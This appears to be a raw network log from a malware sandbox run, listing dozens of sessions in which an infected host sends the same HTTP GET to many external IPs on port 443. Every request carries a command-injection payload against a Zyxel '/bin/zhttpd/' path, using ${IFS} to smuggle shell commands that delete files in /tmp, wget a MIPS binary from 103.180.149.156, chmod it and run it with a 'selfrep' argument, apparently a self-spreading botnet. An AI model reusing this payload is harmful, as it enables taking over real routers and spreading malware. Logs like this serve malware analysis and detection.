                                                        Feb 2, 2024 06:21:24.227933884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8008192.168.2.1454522132.178.169.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227963924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8009192.168.2.1433794188.239.247.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228005886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8010192.168.2.1460700141.53.101.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228038073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8011192.168.2.1434258171.97.229.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228082895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8012192.168.2.1459770119.239.4.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228127003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8013192.168.2.145086288.11.134.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228174925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8014192.168.2.1450940118.236.218.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228203058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8015192.168.2.1457460107.62.251.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228240013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8016192.168.2.144022841.200.97.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228292942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8017192.168.2.1440800101.98.30.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228316069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8018192.168.2.1436610136.25.6.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228362083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8019192.168.2.1441828185.186.37.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228399038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8020192.168.2.14482222.129.158.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228435040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8021192.168.2.143763034.21.232.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228477955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8022192.168.2.145621491.204.179.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228507996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8023192.168.2.1458928152.252.145.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228552103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8024192.168.2.1445188216.69.16.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228571892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8025192.168.2.1445004198.6.253.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228626013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8026192.168.2.1445398140.111.41.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228673935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8027192.168.2.1460330191.132.19.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228704929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8028192.168.2.144876827.182.120.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228760958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8029192.168.2.1449572180.232.99.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228801966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8030192.168.2.1443006154.114.105.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228846073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8031192.168.2.1444350216.166.152.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228898048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8032192.168.2.14447482.80.196.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228940010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8033192.168.2.14519725.107.251.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.228982925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8034192.168.2.144877263.241.138.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229016066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8035192.168.2.145074484.120.253.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229084015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8036192.168.2.1450242103.39.46.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229118109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8037192.168.2.1453592133.220.187.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229129076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8038192.168.2.1432972213.3.160.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229176044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8039192.168.2.1450074116.85.110.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229202986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8040192.168.2.1445394185.15.141.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229245901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8041192.168.2.145687450.205.129.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229298115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8042192.168.2.1435176189.76.24.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229342937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8043192.168.2.1455322191.231.104.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229409933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8044192.168.2.14606344.234.234.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229434013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8045192.168.2.1455486125.10.32.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229468107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8046192.168.2.1434230223.119.15.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229506969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8047192.168.2.1433282172.227.223.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229552031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8048192.168.2.1435894117.181.189.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229602098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8049192.168.2.144415839.35.220.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229635954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8050192.168.2.1433824148.80.196.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229682922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8051192.168.2.1457126108.227.74.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229727030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8052192.168.2.1441894125.84.236.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229758024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8053192.168.2.1433458102.35.162.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229780912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8054192.168.2.144819278.35.27.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229831934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8055192.168.2.1439566124.26.93.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229876995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8056192.168.2.1454730124.4.18.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229917049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8057192.168.2.145779454.250.238.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229968071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8058192.168.2.1447210110.67.4.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.229991913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8059192.168.2.1450398190.117.98.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230036020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8060192.168.2.1445274197.203.17.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230084896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8061192.168.2.143765241.177.56.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230123997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8062192.168.2.145940418.192.112.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230159044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8063192.168.2.1451576132.222.16.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230180025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8064192.168.2.144610881.17.123.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230243921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8065192.168.2.1452396149.41.79.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230298996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8066192.168.2.1443092175.75.234.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230324030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8067192.168.2.143698070.252.209.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230370045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8068192.168.2.145271694.29.175.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230417013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8069192.168.2.1446170186.246.231.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.230463028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8070192.168.2.144057053.152.214.221443
                                                        TimestampBytes transferredDirectionData
